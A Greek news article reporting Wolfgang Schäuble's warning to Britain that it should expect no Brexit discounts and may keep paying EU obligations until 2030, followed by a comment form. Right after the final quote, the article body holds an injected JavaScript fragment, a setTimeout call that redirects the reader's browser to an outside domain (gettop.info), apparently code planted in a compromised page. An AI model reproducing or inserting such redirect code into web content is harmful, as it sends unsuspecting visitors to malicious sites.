Σόιμπλε: Μην περιμένετε εκπτώσεις για το Brexit-Θα πληρώνετε για άλλα 10 χρόνια

0
8

 

Με πολύ σκληρή γλώσσα απευθύνθηκε στη Βρετανία ο Γερμανός υπουργός Οικονομικών, Βόλφγκανγκ Σόιμπλε, εξανεμίζοντας τις όποιες ελπίδες της ότι το Βερολίνο θα άμβλυνε τη στάση του, επηρεάζοντας πιθανώς και το Παρίσι. Η Γαλλία ζητεί να καταβάλει το Λονδίνο «υψηλό τίμημα» λόγω Brexit.

Μιλώντας στους Financial Τimes, ο υπουργός διεμήνυσε ότι ακόμα και μετά το Brexit, η Βρετανία θα υπόκειται σε φορολογικούς κανόνες, που θα περιορίζουν τη δυνατότητά της να δίνει κίνητρα παραμονής των επενδυτών στο έδαφός της.

Ο Γερμανός υπουργός αναφερόταν σε διεθνείς πολυμερείς συμφωνίες στους κόλπους του G20 για τον περιορισμό της φοροαποφυγής, οι οποίες μειώνουν τη δυνατότητα της Βρετανίας να παραχωρεί φορολογικά προνόμια σε εταιρείες. Αυτό θα ισχύει και μετά το Brexit.

Επιπλέον, υπενθύμισε πως η Βρετανία θα έχει να εκπληρώσει τις υποχρεώσεις της προς την ΕΕ επί μία δεκαετία και πλέον, έως ότου ολοκληρωθεί πλήρως η έξοδός της.
«Πιθανώς οι οικονομικές της δεσμεύσεις να παραταθούν έως και το 2030, ενώ δεν θα της εξασφαλίσουμε γενναίες εκπτώσεις», τόνισε ο κ. Σόιμπλε setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here